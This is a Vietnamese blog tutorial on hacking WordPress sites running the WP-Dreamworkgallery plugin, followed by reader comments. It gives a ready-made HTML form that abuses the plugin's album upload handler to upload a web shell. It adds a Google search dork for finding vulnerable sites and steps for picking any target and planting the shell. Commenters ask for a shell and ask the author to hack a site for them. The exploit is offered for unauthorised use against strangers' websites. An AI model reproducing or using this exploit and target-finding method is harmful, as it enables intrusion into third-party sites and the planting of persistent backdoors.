Hướng dẫn hack website WordPress thông qua plugin WP-Dreamworkgallery

5

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

Trong bài viết này mình sẽ hướng dẫn các bạn upload shell lên các website WordPress đang cài đặt plugin WP-Dreamworkgallery.

Bước 1: Tạo 1 file Upload.html

Bạn tạo trước cho mình một file html có nội dung như sau :

<html>
<body>
<form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Lưu lại với tên là : upload.html

Bước 2: Xác định mục tiêu

Bạn truy cập vào google và gõ lệnh sau :

inurl:/wp-content/plugins/wp-dreamworkgallery/

Bước 3: Lựa chọn mục tiêu bất kì của bạn.

Sau khi đã có link trang web thì bạn dán lại link vào bước 1 và lưu lại file html.

hack website wordpress

Bước 4: Up Shell

Bạn hãy mở file Upload.html ở Bước 1 lên, chọn shell cần up và upload lên.

Lưu ý: Nếu bạn thấy đoạn lỗi sau đây sau khi upload shell tức là đã thành công.

Truy cập vào file trong đoạn khoanh đỏ là được.

Chúc bạn thành công.

5 Comments
  1. Twin Tower says

    Bạn đã hack dc lần nào chưa thế ?

    1. Nguyễn Hợp Quang says

      Chưa được mình sẽ không đăng bạn nhé 😀

  2. Luong Trieu says

    Xin shell dc ko ?

    1. Nguyễn Hợp Quang says

      cả code đó rồi mà 😀

  3. Ngo Van says

    mình không hiểu lắm, có thể hack giups mình một trang wp được k nhỉ?

Leave A Reply

Your email address will not be published.